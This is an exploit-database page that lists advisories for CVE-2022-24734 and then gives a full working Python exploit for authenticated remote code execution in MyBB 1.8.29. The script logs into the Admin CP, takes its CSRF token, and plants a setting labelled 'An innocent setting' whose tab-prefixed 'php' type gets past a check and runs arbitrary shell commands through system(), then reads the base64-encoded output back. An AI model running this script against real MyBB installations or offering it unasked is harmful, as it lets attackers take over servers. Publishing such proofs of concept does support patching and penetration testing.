| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
| MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (Authenticated) Exploit | 12 May 202200:00 | – | zdt | |
| MyBB (prior 1.8.30) Admin Control Remote Code Execution Exploit | 31 May 202200:00 | – | zdt | |
| Exploit for Code Injection in Mybb | 8 May 202215:20 | – | githubexploit | |
| Exploit for Code Injection in Mybb | 15 May 202219:18 | – | githubexploit | |
| CVE-2022-24734 | 10 Mar 202200:12 | – | circl | |
| MyBB 代码注入漏洞 | 9 Mar 202200:00 | – | cnnvd | |
| MyBB Remote Code Execution Vulnerability (CNVD-2022-20097) | 11 Mar 202200:00 | – | cnvd | |
| MyBB Admin Control Panel Remote Code Execution (CVE-2022-24734) | 20 Apr 202200:00 | – | checkpoint_advisories | |
| CVE-2022-24734 | 9 Mar 202221:25 | – | cve | |
| CVE-2022-24734 Remote code execution in mybb | 9 Mar 202221:25 | – | cvelist |
# Exploit Title: MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-05-08
# Exploit Author: Altelus
# Vendor Homepage: https://mybb.com/
# Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1829
# Version: MyBB 1.8.29
# Tested on: Linux
# CVE : CVE-2022-24734
# An RCE can be obtained on MyBB's Admin CP in Configuration -> Add New Setting.
# The account used must have the Admin CP right to add or update settings (the payload is a setting whose 'extra' field is evaluated as PHP). This was tested on MyBB 1.8.29.
# The vulnerability may have existed as early as 1.4.0 since this
# 'php' checking is introduced in 1.4.0 (https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f)
import requests
import argparse
import random
import string
from base64 import b64decode
from bs4 import BeautifulSoup
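def login(username, password, session=None, base_url=None):
    """Authenticate against the MyBB Admin CP and keep the session cookie.

    Args:
        username: Admin CP user name.
        password: Admin CP password.
        session: HTTP client exposing ``post``; defaults to the module-level
            ``r_client`` session so the login cookie is reused by later calls.
        base_url: Target origin (``scheme://host[:port]``); defaults to the
            module-level ``host``.

    Raises:
        SystemExit: with status 1 when the login page reports bad credentials
            (the original exited with 0, which hid the failure from callers
            and wrappers checking the exit status).
    """
    client = r_client if session is None else session
    target = host if base_url is None else base_url
    form = {
        "username": username,
        "password": password,
        "do": "login",
    }
    page = client.post(target + "/admin/index.php", data=form).text
    # Detection is text-based on the English error sentence; presumably a
    # localized install would slip past it and only fail later on
    # "Access Denied" in add_settings.
    if "The username and password combination you entered is invalid" in page:
        print("[-] Login failure. Incorrect credentials supplied")
        raise SystemExit(1)
    print("[+] Login successful!")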
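def add_settings(cmd, raw_cmd=""):
    """Create a MyBB setting whose ``extra`` field runs a shell command (CVE-2022-24734).

    The setting ``type`` is sent as a tab character followed by ``php``; per the
    file header the leading tab is what gets the request past the check on the
    ``php`` type, and the command output then shows up when the settings list is
    rendered, which is what ``get_cmd_result`` reads back.

    Args:
        cmd: Shell command to run; its output is piped through ``base64 -w 0``
            (GNU coreutils syntax) so ``get_cmd_result`` can decode it.
        raw_cmd: If non-empty, passed to ``system()`` verbatim with no base64
            wrapping and takes precedence over ``cmd``.

    Returns:
        The random setting name, used by ``get_cmd_result`` to locate the row.

    Raises:
        SystemExit: with status 1 when the user lacks the settings right, the
            CSRF token cannot be read from the form, or the server rejects the
            setting.

    Caveats: the command is spliced into a single-quoted PHP string literal, so
    a command containing ``'`` (or ``"``) breaks the payload. The setting is
    persisted in the database and is never removed by this script; delete it
    from Admin CP -> Configuration -> Settings after the engagement.
    """
    add_url = host + "/admin/index.php?module=config-settings&action=add"
    form_page = r_client.get(add_url).text
    if "Access Denied" in form_page:
        print("[-] Supplied user doesn't have the rights to add a setting")
        raise SystemExit(1)
    print("[*] Adding a malicious settings...")

    # The Admin CP rejects posts without its per-session CSRF token.
    token_inputs = BeautifulSoup(form_page, "lxml").find_all("input", {"name": "my_post_key"})
    if not token_inputs:
        print("[-] Could not find my_post_key on the add-setting form; not the Admin CP form page?")
        raise SystemExit(1)
    my_post_key = token_inputs[0]["value"]

    setting_name = get_rand_string()
    if raw_cmd != "":
        extra = "\" . system('{}') .\"".format(raw_cmd)
    else:
        extra = "\" . system('{} | base64 -w 0') .\"".format(cmd)

    data = {
        "my_post_key": my_post_key,
        "title": "An innocent setting",
        "description": "An innocent description",
        "gid": 1,
        "disporder": "",
        "name": setting_name,
        "type": "\tphp",  # tab-prefixed 'php' is the type-check bypass
        "extra": extra,
        "value": "An innocent value",
    }
    response = r_client.post(add_url, data=data, allow_redirects=False)
    # A successful add redirects (302) back to the settings list; anything
    # else is an error page whose message sits in a <div class="error">.
    if response.status_code != 302:
        errors = BeautifulSoup(response.text, "lxml").find_all("div", {"class": "error"})
        if errors:
            reason = errors[0].text
        else:
            reason = "no error message found (HTTP {})".format(response.status_code)
        print("[-] Exploit didn't work. Reason: '{}'".format(reason))
        raise SystemExit(1)
    print("[+] Malicious post settings accepted!")
    return setting_name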
def get_rand_string(length=20):
    """Return ``length`` random ASCII letters, used as a throwaway setting name.

    Not security-sensitive: the name only needs to be unlikely to collide with
    an existing setting, so ``random`` is adequate here.
    """
    alphabet = string.ascii_letters
    return "".join(random.choices(alphabet, k=length))
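def get_cmd_result(ident_string, raw_cmd=""):
    """Render the settings list (which runs the planted setting) and print its output.

    Args:
        ident_string: Setting name returned by ``add_settings``; the row is
            located by its ``row_setting_<name>`` element id.
        raw_cmd: Must match the value given to ``add_settings``: when empty the
            captured text is base64-decoded, otherwise it is printed as-is.

    Raises:
        SystemExit: with status 1 when the row or its output cell is missing
            from the page, or the captured text is not valid base64 (e.g. the
            target's ``base64`` does not support ``-w 0``).
    """
    listing = r_client.get(host + "/admin/index.php?module=config-settings&action=change").text
    row_id = "row_setting_{}".format(ident_string)
    rows = BeautifulSoup(listing, "lxml").find_all("tr", {"id": row_id})
    if not rows:
        print("[-] Setting row '{}' not found in the settings list".format(row_id))
        raise SystemExit(1)
    cells = rows[0].find_all("div", {"class": "form_row"})
    if not cells:
        print("[-] Setting row '{}' has no form_row cell to read output from".format(row_id))
        raise SystemExit(1)
    cmd_result = cells[0].text
    if raw_cmd == "":
        # The first two characters of the cell are skipped before decoding
        # (kept from the original; presumably layout characters that precede
        # the command output -- TODO confirm against a live page).
        try:
            # errors="replace": command output is not guaranteed to be UTF-8.
            cmd_result = b64decode(cmd_result[2:]).decode(errors="replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            print("[-] Output was not valid base64: {!r}".format(cmd_result))
            raise SystemExit(1)
    print("[+] Result: {}".format(str(cmd_result)))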
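# Entry point. Everything is assigned at module scope (inside the __main__
# guard) because login/add_settings/get_cmd_result read ``host`` and
# ``r_client`` as globals. Note that credentials passed on the command line are
# visible in process listings and shell history; prefer a throwaway account.
if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="MyBB <= 1.8.29 authenticated Admin CP RCE (CVE-2022-24734)")
    parser.add_argument('--username', required=True, help="MyBB Admin CP username")
    parser.add_argument('--password', required=True, help="MyBB Admin CP password")
    parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
    parser.add_argument('--cmd', required=False, help="Command to run")
    parser.add_argument('--raw_cmd', required=False, help="Command to run directly into system()")
    args = parser.parse_args()

    username = args.username
    password = args.password
    # Drop a trailing slash so the "/admin/index.php" suffix does not yield "//".
    host = args.host.rstrip("/")
    cmd = "id" if args.cmd is None else args.cmd
    raw_cmd = "" if args.raw_cmd is None else args.raw_cmd

    # One session for the whole run so the Admin CP login cookie is reused.
    r_client = requests.Session()

    login(username, password)
    ident_string = add_settings(cmd, raw_cmd=raw_cmd)
    get_cmd_result(ident_string, raw_cmd=raw_cmd)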